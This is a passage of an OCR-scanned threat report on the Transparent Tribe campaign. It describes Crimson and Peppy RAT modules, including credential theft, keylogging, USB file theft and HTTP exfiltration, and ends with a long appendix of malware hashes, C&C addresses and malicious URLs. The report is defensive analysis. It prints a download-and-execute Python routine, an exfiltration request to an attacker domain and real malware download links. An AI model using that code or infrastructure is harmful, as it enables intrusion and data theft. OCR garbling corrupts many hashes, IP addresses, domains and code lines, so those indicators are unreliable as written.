twice, first containing a link to: hxxp://bbmsync2727[.]com/upd/secure_scan.exe and then: hxxp://bbmsync2727[.]com/ 
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ccmb/ssm.exe . 

In the module that we analyzed, the downloader logic was configured to request a file from a hardcoded URL: hxxp :// 
sahirlodhi[.]com/usr/api.txt , which is likely a compromised website. The module expects that another URL will be stored 
at the previously retrieved URL, which initially we found to be the following: hxxp://bbmsync2727[.]com/upd/secure_scan. 
exe (md5: e456d6035e41962a4e49345b00393dcd). This payload is a MSIL/Crimson Downloader variant that, when 
executed, will begin the MSIL/Crimson lifecycle all over again by downloading a new controller/orchestrator. 


secApp 

The secApp that we analyzed (md5: ccfd8c384558c5a1 e09350941faa08ab) contained functionality very similar to the 
initial downloader, however the initial beacon that is sent to the C&C was doupdat rather than update and was configured 
to connect to the same hardcoded C&C but to a different port. In addition to supporting the update command issued by 
the C&C, this module also supports the following commands: info, upsecs, and upmain. The info command supports the 
same functionality that the main RAT module supports while upsecs and upmain allows the controller to modify the path 
and application names for both the secApp and mainApp. 


Credential Stealer 

The pssApp is a password harvesting module that initially appears to support retrieving saved credentials from the 
Chrome, Firefox, and Opera browsers. Successfully harvested credentials are stored in a hardcoded location such as: 
%APPDATA%\Roaming\chrome\chrome_update . If no credentials are found, the credential log will simply contain “Not 
Found> > <” while an example of successfully stolen credentials are shown in Figure xx. In our very limited testing, this 
module was not able to retrieve passwords from Opera 35.0.2066.68 or Firefox 44.0.2 but was successful with Chrome 
48.0.2564.116 m. 


chnome_update - Notepad 


File Edit Format View 

Help 

ftp://192.16S. 

/>robii5t>robu5t< 


Figure 28: Successfully harvested credentials by the pssApp module 

Some samples (md5: 8a991 eec65bd90f1 2450ee9dac0f286a) also appear to support the retrieval of credentials from 
Windows Live, FileZilla, Vitalwerks’ Dynamic Update Client (DUC), and Paltalk. 


Keylogger 

The keylogger module is a basic keylogger that stores keylogs in a plain text file (Fig. 29) in a hardcoded location. The 
module that we analyzed (md5: fl 81 72d7bb8b98246cb3dbb0e91 44731) was hardcoded to store keylogs in a file named 
“nvidia” in the following location: %APPDATA%\NVIDIA\ . 

[untitled - Notepad] [ ] - 

ebohf g 


Figure 29: Data stored in “nvidia” keylog 
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USB Module 

If either the updatu or usbwrm commands are issued, a USB drive module may be downloaded and set to execute 
on next startup. In the payload that we analyzed, the purpose only appears to search for potentially interesting files in 
removable storage and copy them to the local disk, likely so they may be exfiltrated at a later time. This payload may 
be configured with a set of file extensions (Fig 30) that are used to search for matching files on any USB drives. If any 
files are found, they are copied to a configured directory on the local disk while a running list of copied files are stored 
in a separate log so duplicate files are not copied. The anti-duplication method, however, only utilizes filenames so in 
the event that an already copied file is later modified, a newer copy will not be saved for exflitration. Despite one of the 
commands that may be used to download this payload may indicate this payload to contain “worm” functionality, that 
does not appear to be the case. 


remvUser 

During our research, we were not able to locate this module; so we are not sure what its functionality is. A best guess is 
that it could be a clean-up/implant removal utility. 


Python/Peppy 

Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/ 
Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal 
functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of 
potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and 
exfiltration of files using configurable search parameters begins (Fig. 30). Files are exfiltrated using HTTP POST requests 
(Fig. 31). 


SYNCRULESCONFIG {'HOME': r( M '*.pdf or ' 
'FIXED': r(" '*.pdf' or '*.doc*' or '*.xls*' 

*.txt' or '*.doc*' or '*.xls*' or '*.ppt*' or 
or '*.ppt*‘ or '*.mdb*' or '*.dwg' or '*.dbx' 

'*.mdb*' or 
M ), 

•*.dwg' or 

'*.dxf' or 

’*.dbx' “), 


'REMOVABLE': r(" size < 5 mb if ('*.jpg' or 

jpeg' or '*.avi') else (size < 100 mb and ( 

'♦.pdf' or ' 

*.txt' or ' 

*.doc*' or 

■*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dxf , )l 

>")} 


Figure 30: Peppy configurable search parameters 

T Follow TCP Stream (tcp. stream eq 8) 


T + X 


■Stream Content 

POST /0. 1/files. php/C/Documents%20and%20Settings HTTP/1.1 

Accept-Encoding: identity 

Username: 

Content-Length: 5942 
AuthToken: 

Connection: close 
User-Agent: Python-urllib/2.6 
Host: mvssync87G7.com 

Content-Type : multipart/form-data ; boundary=74925276adfe49c4a0267510b612a232 
--74925276adfe49c4a0267510b612a232 

Content-Disposition: form-data; name=" filename="C : \\Documents and 

Settings 

Content-Type: text/plain 


Figure 31: Peppy exfiltrating files 
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In addition to keylogging and the exfiltration of files, Peppy is also capable of accepting commands from its C&C to 
update itself, disable itself, exfiltrate a specific file, uninstall itself, execute a shell command, take screenshots, spawn a 
reverse shell, and download a remote file and execute it. 

In addition, we have discovered a simple Python-based downloader (md5: 82719f0f6237d3efb9dd67d95f842013) that 
was possibly written by the author(s) of Peppy based on code overlap between the downloader’s functionality and 
Peppy’s download_exec routine (Fig. 32, 33). 


class MyllRLOpenerC urllib.FancyURLopener ) : 

def http_error_default{ self, url, fp , errcode, errmsg, headers)'. 

Except! on (errmsg) 
def downloadexec (url) : 

locfile os. path. join (APPDATA, "btc.exe") 

MyURLOpenerC ) . retrieve (url, locfile) 
os. start file (locfile) 


Figure 32: Python downloader code 


class My URLOpenerfur I lib. FancyURLopener) : 

def http_errar_default{seZ f, url, fp, errcode, errmsg, headers ): 

Exception (errmsg) 


def download_exec{conn, db, job_id, url): 

locfile os. path. join (APPDATA, 'd^d.exe' random. randrangeE 1000, 9999)) 

MyURLOpenerf ) . retrievefurl, locfile) 
os. sta rtf ilef locfile) 


Figure 33: Peppy download _exec routine and MyURLOpener class 


Conclusion 

As we described, there are clearly a number of common threads throughout these attacks. We have been able to 
connect campaigns, vectors, payloads, and, in some cases, infrastructure, but additional details continue to emerge. 
In the short term, this serves as an important reminder that wars are no longer waged solely on the ground or in the 
air. Rather, threat actors (whether from nation-states or private parties with interests in international conflicts) will use a 
variety of cyber tools to achieve their goals. 






Appendix 

Cluster 1 lOCs 

Crimson Downloader Samples 
032bacaea0d335daec271f228db6bc88 
052eb62056794a08a04f4cd61 455602c 
06c1 8c72f9f1 36bacc5c9b0d8fa931 95 
0a8d41 4eb91 0eb4caeb96a648b70eef3 
0b651 ef0eb7b91 9e91 a2c5c5dbccd27e 
0ed7f4851 66796e1 0bcb91 23de24d21 1 
17dbd878985b78848d4a3a758a3ef89c 
1 af4df 1 382c04677050379ccdafcafd2 
21 fc043b31 d22b5c3f5529db83e90422 
2c9cc5a8569ab7d06bb8f8d7cf7dc03a 
340f31 a36e1 59e58595a375b8b0b37b2 
34ad98510d4d6e24b7e38f27a24ad9f6 
3a67ebcab5dc3563dc1 61 fdc3c7fb1 61 
3b08095786731c522f5649081f8dbb7e 
3cc848432e0ebe25e4f1 9effdd92d9c2 
41a0e4f9745e4bd5ad7b9d500deb76fa 
428371 be27fc057baac3ea81 a8643435 
5358881 63707b60c1 a8dfefffad 70635 
53c 1 0ac66763739b95ac71 92a9f489ad 
5b6beb9ee6e604f4e474b81 29e61 35f4 
5c6b401979469040b39babb0469fc0c8 
5d03881 7ffeab771 541 5d68d438af345 
5ff65fdefe1 44800e43a2f6cc6244c75 
6c3b38bf90a203b2f7542d0359b8e60e 
6d2442494c301 9f1 597256cbeb45e5f6 
6eb40b2e6a67a785d5cc6e4ad9102b5d 
7289c1 60582f01 0a3c7dbd51 2c5d8a09 
75b390dc72751 a062e81 06328450ef87 
796ae0b75c0e0b08ea84668495df4070 
7a6b88e43cccc8133c066b87f72c53f7 
803d2758c3b89882e2d41 867768d7b1 5 
83a8ce707e625e977d54408ca747fa29 
85e2c950ddb1 8fe1 ddl 8709cfbb9b203 
947701 86027 a0ccdf733 b72894a0c7d0 
9d4504cdb7b02b9c9fffefcf9b791 01 d 
ac637313520ca1 59a02d674474d341 ef 
b6741 1 da3ddfcae9f2a2093561 9e5c4a 
b8098acf09d1 21 ab298351 f0c804ef8b 
bfl 4001 05c97a28fefd33d8c0df5d4c1 
c61 061 a40dba41 1 b839fe631 299c267a 
ca27cefe404821 ccd8dc695da551 02e8 
Cdc6bb98a2629338d49587d186562fd3 
dac4f8ba31 90cfa1 f81 3e79864a73fe1 
df6b3946d1 064f37d1 b99f7bfae51 203 
e3254ad0275370f92cffeacbf603a905 
e456d6035e41962a4e49345b00393dcd 
edccbc7f880233de987ba4e917877df2 
eee91 d8de7ea7c0ac3372f65c43e91 6a 


Crimson Downloader Droppers 

9e0fef5552100a7e0a2d044b63736fb2 
7470757050f5841 01 a851 d7ba1 05db31 


Crimson SecApp Samples 
07defabf004c891 ae836de91 260e6c82 
0ad8491 21 b4656a239e85379948e5f5d 
0ed7f4851 66796e1 0bcb91 23de24d21 1 
1 91 1 cl 234cc291 8273baeffd7d37392e 
2d6d0dbd8ac7c941 d78ba1 4289a7ab9d 
43b39b40605afb9d2624f1 cede6b48a8 
65f61 43d69cb1 246a1 1 7a704e9f07fdc 
723d85f905588f092edf869 1 cl 095fdb 
765f0556ed4db467291d48e7d3c24b3b 
9b3cb979b1 397a4a1 3ea62dbf4651 0d8 
9fcc3e18b9c0bd7380325f24a4623439 
b4080cda4fb 1 b27c727d546c8529909c 
ca77af41 cbd8c2fd44085d0d61 bac64b 
df6be8accc487bf63260aacf5e582fe2 


Crimson RAT Samples 
073889fe855f401c3c4cc548bc08c502 
0964887f6f709f9c3f1 1 701 41 2acb9c1 
1 4be26aa207cff81 ff81 4c8a7a8e2f03 
1 9b9f62f29f3689b1 db4c56deed7e1 62 
1 al 426a94e37e5f3c1 4cd2b6740e27e1 
3ff1 65ee68d1 bc03ae7d4d3baf99b963 
4297041 e3a701 ed8c01 e40d6c54264a1 
43f47d2045ca98265fd4bd401 1 a04932 
463565ec38e4d790a89eb592435820e3 
5371 d2984cbd 1 ae8283f9ae9eeee7 1 8d 
53a60acc6a09a7fa2eebf4eb88c81af5 
59e0fc469d1 af7532507c1 9b47f1 9960 
6746c430f978d0bc9bbecff87c651fa2 
71 b4bbddf46e1 99021 0742a406c490bf 
7e42de66eee8d280a3ba49d5b979c737 
81 1 eb99fb1 aca98052db4b78c288889c 
81 971518081 0caaaa969c81 6eb2b7491 
831 7bb3d1 92c4495507a5945f27705af 
8c71 3cffdc599930a9236c2d0d0ee91 a 
92f78a182faf26550d6fab2d9ec0692d 
943f35200dce22766d0c2906d25be187 
94d29dded4dfd920fc41 53f1 8e82fc6c 
9fd2838421b28674783b03eb46f4320f 
a3aa3a1 2d81 c9862b1 8f83a77d721 5ca 
bcbac2241 977c976aec01 592fb51 4aa4 
C2bc8bc9ff7a34f 1 4403222e58963507 
Cb0768c89e83f2328952ba51e4d4b7f1 
d53de7c980eb34f9369e342d5d235c9b 
e7803020e9697d77f1 65babecf20ea82 
eaee83a37691 461 6924eab9b4b96b050 
edl dafl 8ef09fb2a5c58ab89824ecab0 
f078b5aeaf73831 361 ecd96a069c9f50 
fe955b4bbe3b6aa2a1d8ebf6ee7c5c42 


Crimson C&C 
5.189.143[.]225 
5.1 89. 1 67[.]65 
80.241 .221 [.] 109 
93. 1 04.21 3[.]21 7 
1 93.37.1 52[.]28 
213.1 36.87[.] 1 22 


Peppy RAT Samples 
01 0a501 45563a6c554de1 2b8770f1 6f7 
01 0aa8d6e6f53461 1 8546b1 e4e41 4cb2 
1 31 b4ed3df80e2f794a3e353e2c7f8fb 
1 7d22686bfc825d9369a0751 c4cc6a22 
1 d49dc6af6803d9ffc59a85931 5b2ac4 
221 921 41 d201 0fe9fed871 d05573dda4 
23ec91 6b3eae3f88853bde8081 be870f 
2463d Iffl 166e845e52a0c580fd3cb7d 
2cff1 578ac42cc0cd5f59e28d6e7240f 
31 a9e46ff607b842b8fff4a0644cc0f4 
3540f2771 b2661 ecbd03933c227fb7f7 
3b979fd0a8fa0ecbc334a3bbbfb68a36 
4a71 7b657ea4751 97d967008c7db8353 
51 1 bcd41 1 ec79c6ca555670e98709e46 
5998641 f454f82b738977aa8b3d 1 d283 
725379749d3fa793edcce1 2291 7821 34 
77c7c01 1 7a0e457d7e3ceef4ab82c2ca 
7920862303764a55050d2da38b8bf4db 
858a72981 9cc082f2762b6d488284c1 9 
86e27e86e64031 720a1 ca52d2fbb7c98 
af5e96e260b71 356d62900551 f68f338 
b041 1 7ee1 81 82c1 c07ffaf6fb35b08bc 
C33c79c437d94fad3476f78361df0f24 
C9e4c816b4ef23c28992e0e894b9c822 
ee5a460ded205d2074a23e387c377840 
f 1 3a1 a0cbcd5e1 3dd00dbc77c35973ef 
f6d1 41 f45e76cefcb71 2f69c1 93b3ac1 
f8955450fbd62cb4461 C725d8985ff60 
fa97cba6a52896e1 f21 46957a6eec04f 
fab5eff5fc65a7a2c5920586df5e29c2 


Peppy RAT Domains 

applemedial 21 8.com 

avssync3357.com 

bbmdroid.com 

bbmsync2727.com 

bluesync2121 .com 

eastmedial 221 .com 

eastmedia3347.co.cc 

eastmedia3347.com 

facemedia.co.cc 

kssync3343.com 

kssync3347.co.cc 

kssync3347.com 

mahee.kssync3343.co.cc 

mvssync8767.com 


student3347.mooo.com 
winupdater21 12.com 

Andromeda Samples 
01 2341 1 a6cfe8afb4a45e4afeed767e7 
1 1 4551 a87fa332a243fc05b7246309b9 
1 28c0ccc1 252098bc231 4d88f4e70044 
1 33e0c441 ea744951 080d700604a63ee 
1 f97ddaea7ac0c4e20b2db75969b4545 
4b0481 a591 c87e8542e2089396a1 0d3c 
7ec3ec88185f9c235e2d3da7434b928a 
878aa68245675ca5ea677aaf28707b7a 
990c3b67061 1 09d82627a5642bf1 bb68 
a4ce604f8d3ac2e5facdae3c63ef4dc6 
a6d75b57bd597e723335f96f074f5700 
a6ef041 31 1 497bcddb881 8b5a4f6c90e 
ae2ef98a91c70dc43979ce7df8e475ad 
aec91 b4453a1 b321 e3021 27bc9f21 a7c 
f0e64d2b01 1 223ece668c595406f1 abc 
f41 23e7f09961 479452f0f42b3706293 
f b2cb45 bf53cef4 1 674da2d 9a4bd ba32 


Andromeda Domains 

dvdonlinestore.net 

eastmedia2112.com 

mustache-styles.com 

onlinestoreonsale.com 

pradahandbagsshoes.com 

vhideip.com 

wisheshub.com 

99mesotheliomalawyers.com 


Various Downloader Samples 
2ba1 e2a631 2951 7055ab3a63cb089e33 
41 31 776ae573bdb25009a343cf1 541 f5 
44fe2f4dd8b001 bbcc4de7371 28095ca 
63ee06dae03598 1 c5aea04f5a52879c 1 
643e30e6651 24eea94a22641 f79a9c91 
67bad4ad3d9a06fc20bea8c3ebb7ad01 
7e97efc85be451432388b9f1 ce623400 
861 f621 fdf2d3e760df50009fe2824ae 
a957e3a7aed4efd1 b21 4d3c3b79f5874 
cl 6b43a5897861 fbe023e4b7d340f2e8 
dbd5c44e6c1 89f289e0eea1 454897b26 
e261 50f51 86bb7230d85f4cf3aa45d1 7 

Python Downloader Sample 

8271 9f0f6237d3efb9dd67d95f84201 3 


Meterpreter Samples 
04e8404f1 1 73037ba4e1 1 241 bl 41 d91 d 
c41 1 ee81 c34e1 4a1 ace7e72bea2e8d1 2 
d30c6df9492232304 1 f8036365ab bfd 2 


Meterpreter C&C 
5.199.170[.]149 


njRAT Sample 

27ca1 3685021 4234bcdca765dfaed79f 


njRAT C&C 
5.189.145[.]248 


Malicious Documents 

01 97ff1 1 9e1 724a1ffbf33df1 441 1 001 

1 871 1 fl db99f6a6f73f8ab64f563accc 

1f82e509371 cl c29b40b865ba77d091 a 

278fd26be39a06d5e19c5e7fd7d3dcc2 

3966f669a6af4278869b9cce0f2d9279 

438031 b9d79a1 7b776b7397e989dd073 

68773f362d5ab4897d4ca217a9f53975 

76f410c27d97e6c0403df274bebd5f6e 

98bdcd97cd536ff6bcb2d39d9a09731 9 


Unknown, likely related 
0437655995f4d31 04989fb963aa41 339 
C0ff05a6bf05465adfc9a1 dfd5305bde 


Unknown C&C 
5.1 89. 1 37[.]8 


Luminosity Link Sample 
708a1af68d532df35c34f7088b8e798f 


Luminosity Link C&C 
5.189.145[.]248 


Bezigate Samples 

236e745 1 Cbce959ca0f62fb3b499b54e 
44db769fb1 f29a32d5c1 998e29b4b7c4 
85d182f7a0e0491 69a7bd0aa796fba96 
96dbed32a59b50e61 OOfl ca35ef5a698 
e49edc71 9eaab1 1 a401 58c1 5c9dd9b7b 

Bezigate C&C 
1 07.1 67.93[.] 1 97 
62.4.23[.]46 
ad2.admart[.]tv 
winupdatess.no-ip[.]biz 

DarkComet Samples 
0aecd3b79d72cbfa8f5dce2a12e76053 
278f889f494d62e2 1 4406c4fcfa6f9a3 
fd5a41 9924a081 6c6357b47f4e375732 


DarkComet C&C 
ad2.admart[.]tv 
1 07. 1 67.93[.] 1 97 

Intribune. blogspot[.]com Links 

hxxp://intribune.blogspot[.]com/201 5/1 1 /4-sikh-army-officers-being-trialed-in.html 

hxxp://intribune.blogspot[.]com/2015/1 1/seventh-pay-commission-recommends.html 

hxxp://bbmsync2727[.]com/cu/seventh%20pay%20commission%20salary%20calculator.xls 

hxxp://intribune.blogspot[.]com/201 5/1 1 /army-air-defenceengineers-and-signal-to.html 

hxxp://intribune[.]blogspot[.]com/2015/09/sc-seeks-army-response-on-batch-parity.html 

hxxp://intribune[.]blogspot[.]com/2015/05/seniors-juniors-and-coursemates-please.html 

hxxp://intribune[.]blogspot[.]com/2015/07/awho-defence-and-para-military-forces.html 

attachment, biz links 

hxxp://ceengrmes[.]attachment[.]biz/?att= 1450603943 
hxxp://comdtoscc[.] attachment^] biz/?att= 1451 926252 
hxxp://comdtoscc[.]attachment[.]biz/?att= 14537881 70 
hxxp://fileshare[.] attachment^] biz/?att= 1455255900 
hxxp://fileshare[.]attachment[.]biz/?att= 1455264091 

Cluster 2 lOCs 

Crimson SecApp Samples 
ccfd8c384558c5a1 e09350941 faa08ab 
1 67d632eea9bd1 b6cac00a69b431 a5c0 
e3e4ced9b000aa47a449f186c7604ac8 
79f7e1d6389c73a7e2525d0ec8fa3ce2 
0a7a1 51 80053270e25a220a3e38e7949 
1 7495ce3d1 1 e9cddf5a98ec34ee91 d6a 
1 4840323561 4461 cl f088d524fbd9fd0 
b67047e341 653a01 526cc1 78966d1f6c 
ef0ab9f731 e7c980b1 63c7e1 b5db9746 
3739bbf831 d04e8a2b06275cd3af371 d 
0d7846a76675be378a50667767d0e35a 
4f9b754da90bed9a633130d893d65c4e 
3e91 836b89b6d6249741 dc8ee0d2895a 
85429d5f2745d81 3e53b28d3d953d1 cd 

Crimson RAT Samples 
870c031 2cea7b3b6b82be01 633b071 cd 
a741 65ec1 d55b682ed232ffde62b3b1 1 
8336d9aeccee3408a4f9fbf4b 1 a42bac 
2dfe4468a052a07cab1 1 7a20e1 82adc9 

Crimson C&C 
178.238.228[.]1 13 

Beendoor Downloader 
950eb314435bdb3c46c9f0954c935287 

Beendoor Sample 

d3094c89cad5f8d 1 ea5f0a7f23f0a2 b 1 

Beendoor C&C 
178.238.235[.] 143 


Cluster 3 lOCs 

Crimson RAT Samples 
51 c57b0366d0b71 acf05b4df0afef52f 
438f3ea41 587e9891 484dad233d6faa6 
71 Cd70b289c53567579f8f6033d81 91 b 
d8637bdbcfc91 1 2fcb1 fOI 67b398e771 
12929730cd95c6cf50dd3d470dd5f347 
7ccc752b5956b86b966d15a6a4cf6df0 
b2ed941 5d7cf9bc06f8ccb8cfdba1 ad6 
Cedb0fc3dfbb748fdcbb3eae9eb0a3f1 
95cba4805f980e8c1 df 1 80b660e2abb4 

Crimson C&C 
88.150.227.71 

Cluster 4 lOCs 
Crimson Downloader Sample 
5d9b42853ecf3ff28d4e43 1 3276b2 1 ed 

Crimson RAT Samples 
90b07bc1 2b45f2eb1 b0305949f2cec25 
3e7c2791ff7bc1 4ef30bba74954ef1 e2 
441 451 24e046804bf579c8839b63a9a7 
a73494ca564f6404488a985cefd96f56 
8a0db32b97be1 06d2834739ffd6571 5b 
ddb66b231 ab63c65a8ce1 39e73652aec 

Crimson C&C 
bhai123.no-ip[.]biz 
bhai1.ddns[.]net 
sudhir71 nda.no-ip[.]org 
1 1 9.1 54.1 34[.]21 1 
119.1 54.209[.] 1 75 
119.1 54.220[.]96 
119.1 57. 1 63[.] 1 45 
119.157.229[.]245 
182.181 ,239[.]4 

Unclustered Crimson Samples 

Crimson Downloader Samples 
6a1 c037c661 84aa39096933f75d2d8ca 
99d93e0c6bf9cf9acb92580686f6b743 
af071 cd2420057090cfe33fefa1 39d01 
8c30ed1 bcl 3feaa8e937be0f6a739be4 
adf657337d7fa7fa07 c72b 1 2f b880e4 1 
e2d 1 309893c0d e5a026a2ae9e8ada486 
99d93e0c6bf9cf9acb92580686f6b743 
d0 1 52f228e934d cafa866445c08e3242 
af071 cd2420057090cfe33fefa1 39d01 
9b674985a412c4c07d52c7482c2ed286 
C3af6b938988a88ea2dc2e59f8418062 
2d58826fbff1 9791 8caa805aeed86059 
ab6b6f675e48d81 8044c5e66d0581 3ce 
4b1a627c43d4e0af504bf20023e74f6b 
75798547f0ddca076070bcea67a0b064 
0255f73a32bf781 c786d1 9d1 49ddfb90 
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1 6eb1 46eee1 47a333ef82d39266d5cfb 
2507f545a2d6e52ade2d7708d9ce89d1 
f9798f1 71 1 94ee4fec5334ded3d786e7 
9b77eb38e32d43a97c5bde5ec829c5ca 
2eea994efa88e0a612e82ee3e08e78f1 

Crimson SecApp Samples 
c303a6ac44e3c59a9c36 1 3ac9f92373 b 
92d6366d692a1 b3691 dcel 379bb7b5aa 
eb0 1 b bfe8ca7 e8f59aab475ad 1 f 1 8245 
4d7ad9ab4c1 d40365da60d4f2f1 95db4 
f936afdd0b69d1 0921 5d295ab864d309 
ec4bef2233002d8fe568428d1 6e61 Obi 
045c4b69d907833729fd83d937669f66 
5221 78a60b030bbab91 0cb86cfeaff20 
1 ab5f55763663ffb080707939781 2b47 
73b878e56f790dccf08bd2344b4031c8 
f0f6544d d b26c55df2d6 1 84f433d8c1 7 
7c23f984170fd793cfde5fd68535d0a8 
73b878e56f790dccf08bd2344b4031c8 
7e50c67f1 e94b1 54f1 1 0d5d73e2f31 2c 
1 bedd50f4ae757c6009acbe7da021 1 22 
ae9659a2c08e2cb9ab9e5cdcb8ab4036 
0991 033c241 4b4992c1 b5ab21 c5a47e2 
f71 0e3ad1 9a682dab374c1 67c7c2796a 

Crimson RAT Samples 
21 4eb28f04d969c9f637b09e4ffad644 
2909731 9b60c1 03421 43721 4d5a3297e 
38ce32cb94092cc6790030abcc9a638b 
439ba84a964a1 7ce2c3d51 ac49c68f81 
4e9b81 e70227575f2d2a6dd941 540afa 
5b4361 e6a61 1 7e9f71 89a564f461 57d7 
5dbeb8475e22a938415eb43e6bd24fe8 
6409930f39cd6c1 7fb68f7fee47b1 cdf 
82377fcf288e9db675ab24cbf76ea032 
84c30675b5db34c407b98ea73c5e7e96 
897fc3a65f84e1c3db932965a574d982 
9e73d275202b02b3f0ed23951fda30da 
b0327f1 55ebaba231 02f72c1 1 00fa26b 
b05730eda99a9 1 60cc3f8d ec66e9f347 
b467df662af8a1 fbafa845c894d91 7e3 
C0bf5a0f535380edec9b42a3cebb84c4 
ca48224adce9609d c07 e50930dd 1 afae 
dac44b9d5a8494a3293088c9678754bc 
e021 771 4f3a03fae4cdf4b51 2021 3c38 
e662031 77a03743a6361 a7b3e668b6a6 
f05834a930f6fda6b87701 1 c3fb3ef1 8 
fl a2caf0dd7922ea3a64231 fd5af771 5 

Crimson C&C 
5.189.131 [,]67 
5.189.152[.]147 
5.1 89.1 67[.]220 
5.1 89.1 67[.]23 
79.143.181 [,]21 
79.1 43.1 88[.] 1 66 


Threat Insight | Operation Transparent Tribe 


193.164.131 [,]58 
213.136.69[.]224 
21 3.1 36.73[.] 1 22 
213.136.84[.]43 

MSIL/Crimson Modules 

Keylogger 

fl 81 72d7bb8b98246cb3dbb0e91 44731 
b55a7da332bed90e79831 3b968ce781 9 
C0eb694960d0a7316264ced4d44b3abb 
292f468f98e322795d1 1 85c2b1 5c1f62 
b6263f987fdec3fb3877845c8d5479dd 
127ee83854f47628984ab47de725ee2f 
2fa82dd2490fc697bb0bb0f8feb0dd85 
bc6d 1 39a3d630ba829337687b9328caf 
f3c8630d06e51 e8f76aa1 fb438371 d21 
3a64e2d3558a28c4fdb0f076fa09e1a1 
370bb0ec1 cl 6bd8821 f7e53f6bfc61 e3 

Infostealer 

d938a75d93c20790b1f2b5d5b7294895 
29eb61 f04b905e21 33e9afdd1 2482073 
9bdfc0d5c45f1 cel 20041 9ec6eec1 5f4 
8a991 eec65bd90f1 2450ee9dac0f286a 

USBstealer 

C3d65d73cd6894fdad3fc281b976fd8b 

e9b1a3aa2de67300356b6587a8034b0b 

cf5e47261 3921 dc330008c79870b23ab 

bf2eb6c1 9778a35f81 2ddc86d61 6c837 

1 e5c2029dafdd50dce2effd51 54b6879 

b785db2b3801 d51 90dad9e6f03d48999 

3f84d d cOd 9ec7b08477a76b75 b442 1 b8 

c0ceba3a708082c372c077aa9420d09e 

dl 1 ebec8f1 d42dd1 39b1 8639f7f9534a -> 5. 1 89. 1 67[.]220 

URLDownloader Module Sample 
53201 3750ee3caac93a99721 03761 233 

URLDownloader C&C 
hxxp://sahirlodhi[.]com/usr/api.txt 
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